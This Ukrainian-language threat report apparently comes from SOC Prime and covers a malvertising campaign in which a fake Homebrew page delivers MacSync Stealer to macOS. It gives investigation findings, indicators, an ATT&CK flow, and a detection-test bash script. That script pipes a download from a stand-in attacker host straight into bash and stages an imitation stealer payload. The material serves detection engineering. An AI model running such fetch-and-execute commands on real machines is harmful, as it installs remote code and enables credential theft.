SOC Prime Bias: Середній

05 May 2026 14:17 UTC
newspaper icon SANS Internet Storm Center

Фальшива реклама Homebrew призводить до інфікування MacSync Stealer

Author Photo
SOC Prime Team linkedin icon Стежити
Фальшива реклама Homebrew призводить до інфікування MacSync Stealer
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Резюме

Атакуючі використовують шкідливі пошукові оголошення, щоб направити користувачів на підроблений вебсайт Homebrew, який націлюється на системи macOS за допомогою MacSync Stealer. Підроблена сторінка інструктує жертв скопіювати й виконати shell-команду, яка завантажує і запускає шкідливе програмне забезпечення. Після активації stealer збирає облікові дані та інформацію про систему, стискає вкрадені дані в архів ZIP та відправляє їх на сервер командування та контролю. Кампанія підкреслює зростаюче використання зловмисної реклами для компрометації користувачів macOS.

Розслідування

Аналітик простежив атаку від шкідливої реклами до підробленої сторінки Homebrew, розміщеної на Google Sites. Та сторінка представила zsh команду, яка, коли була виконана, завантажила додаткові скрипти з інфраструктури, контрольованої нападниками, і створила тимчасовий ZIP-архів, що містив зібрані дані. Мережевий трафік підтвердив, що архів був ексфільтрований на домен glowmedaesthetics.com. Дослідники задокументували відповідні індикатори, включаючи URL-адреси, домени та шляхи до файлів, пов’язані з ланцюгом зараження.

Пом’якшення

Користувачам слід уникати копіювання і запуску команд з ненадійних вебсайтів і переконатися у легітимності сторінок пакетних менеджерів до взаємодії з ними. Блокування реклами або розширення для браузера, орієнтовані на безпеку, можуть допомогти зменшити ризик впливу від шкідливих спонсорованих посилань. На macOS слід залишати Gatekeeper увімкненим, а виконання програм обмежувати довіреним, підписаним програмним забезпеченням. Оборонцям також слід моніторити вихідний трафік на з’єднання з незнайомими доменами.

Відповідь

Служби безпеки повинні виявити виконання підозрілої zsh команди і будь-яку curl активність, що навідується на виявлену шкідливу URL-адресу. Також повинні бути створені сповіщення для створення /tmp/osalogging.zip архіву і для вихідного трафіку до glowmedaesthetics.com. Якщо підозрюється зараження, ізолюйте постраждалу систему, зберіть криміналістичні докази та скиньте будь-які скомпрометовані облікові дані.

"graph TB %% Class Definitions classDef technique fill:#99ccff %% Node definitions initial_malicious_link["<b>Техніка</b> – <b>T1204.001 Шкідливе посилання</b><br/><b>Опис</b>: Жертва клацає на шкідливу URL-адресу в оголошенні та перенаправляється на підроблену сторінку завантаження Homebrew."] class initial_malicious_link technique user_copy_paste["<b>Техніка</b> – <b>T1204.004 Шкідливе копіювання та вставка</b><br/><b>Опис</b>: Жертва копіює спеціально створений скрипт з веб-сторінки та вставляє його в Terminal, запускаючи код атакуючого."] class user_copy_paste technique unix_shell["<b>Техніка</b> – <b>T1059.004 Unix Shell</b><br/><b>Опис</b>: Скрипт Zsh запускається, завантажуючи додатковий корисний вантаж з glowmedaesthetics.com."] class unix_shell technique gui_input_capture["<b>Техніка</b> – <b>T1056.002 GUI захоплення введення</b><br/><b>Опис</b>: Підроблений графічний запит пароля захоплює пароль користувача macOS."] class gui_input_capture technique local_data_staging["<b>Техніка</b> – <b>T1074.001 Локальне зберігання даних</b><br/><b>Опис</b>: Інформація системи та журнали архівуються в /tmp/osalogging.zip для подальшої ексфільтрації."] class local_data_staging technique exfiltration_c2["<b>Техніка</b> – <b>T1041 Ексфільтрація через C2-канал</b><br/><b>Опис</b>: Zip-файл надсилається на C2-сервер атакуючого через HTTPS."] class exfiltration_c2 technique gather_software_info["<b>Техніка</b> – <b>T1592.002 Програмне забезпечення</b><br/><b>Опис</b>: Скрипт перераховує встановлене програмне забезпечення для створення інвентаризації хоста жертви."] class gather_software_info technique data_local_system["<b>Техніка</b> – <b>T1005 Дані з локальної системи</b><br/><b>Опис</b>: Читає додаткові локальні файли для включення в ексфільтрований архів."] class data_local_system technique %% Connections initial_malicious_link –>|веде до| user_copy_paste user_copy_paste –>|веде до| unix_shell unix_shell –>|веде до| gui_input_capture gui_input_capture –>|веде до| local_data_staging local_data_staging –>|веде до| exfiltration_c2 local_data_staging –>|також веде до| gather_software_info local_data_staging –>|також веде до| data_local_system "

Потік атаки

Виконання симуляції

Передумови: перевірка телеметрії та базових умов має бути пройдена.

Обґрунтування: Цей розділ деталізує точне виконання техніки супротивника (TTP), призначеної для запуску правила виявлення. Команди та наративи ПОВИННІ безпосередньо відповідати визначеним TTP і мають на меті виробити точну телеметрію, очікувану в логіці виявлення.

  • Опис атаки та команди:

    1. Первинна приманка: Жертва отримує фішинговий електронний лист із посиланням на підроблену сторінку “tap” Homebrew, яка містить шкідливий скрипт установки.

    2. Виконання: Жертва копіює однострічний код із сторінки та вставляє його у свій термінал:

      curl -fsSL https://malicious.example.com/macsyncloader.sh | /bin/bash
      • The curl бінарний файл викликається (відповідає правилу).

    3. Скрипт завантажувача (macsyncloader.sh):

      • Завантажує корисний навантажувач MacSync через curl.
      • Записує завантажувач у /tmp/.macsync і виконує його.
      • Спливаючі діалогові вікна для крадіжки облікових даних (симульовано за допомогою osascript на macOS, але тут ми просто echo).

    4. Стійкість: Скрипт реєструє LaunchAgent для запуску при вході в систему (поза межами поточного правила, але має значення для більш широкого виявлення).

  • Скрипт регресійного тесту: Наступний скрипт Bash відтворює точні кроки, забезпечуючи відповідність телеметрії логіці виявлення.

    #!/usr/bin/env bash
set -euo pipefail

# -------------------------------------------------
# Імітоване Сховище скриптів, що контролюються атакуючим
# -------------------------------------------------
MALICIOUS_HOST="https://malicious.example.com"
LOADER="${MALICIOUS_HOST}/macsyncloader.sh"

# -------------------------------------------------
# Крок 1: Завантаження і виконання шкідливого завантажувача
# -------------------------------------------------
echo "[*] Виклик правила виявлення за допомогою curl ..."
curl -fsSL "$LOADER" | /bin/bash

# -------------------------------------------------
# Крок 2: (Внутрішні дії завантажувача) – Імітований корисний вантаж
# -------------------------------------------------
# Зазвичай завантажувач довантажував би корисний вантаж із віддаленого хосту.
# З метою цього тесту ми вбудовуємо корисний вантаж у лінію.
cat <<'PAYLOAD' > /tmp/.macsync
#!/usr/bin/env bash
echo "Виконано корисний вантаж MacSync – ексфільтрація інформації хоста..."
# Імітація захоплення облікових даних (без реальних даних)
echo "Зібрані облікові дані: user@example.com / password123"
PAYLOAD

chmod +x /tmp/.macsync
/tmp/.macsync

echo "[*] Симуляція завершена."

  • Команди для очищення: Видалити артефакти та завершити всі небажані процеси.

    #!/usr/bin/env bash
set -euo pipefail

echo "[*] Очищення артефактів симуляції ..."
rm -f /tmp/.macsync
# У цьому тесті не було створено постійних служб
echo "[*] Очищення завершено."

Приєднуйтесь до платформи Detection as Code від SOC Prime щоб покращити видимість загроз, найбільш актуальних для вашого бізнесу. Щоб допомогти вам розпочати та отримати негайну цінність, забронюйте зустріч зараз з експертами SOC Prime.

Приєднатися безкоштовно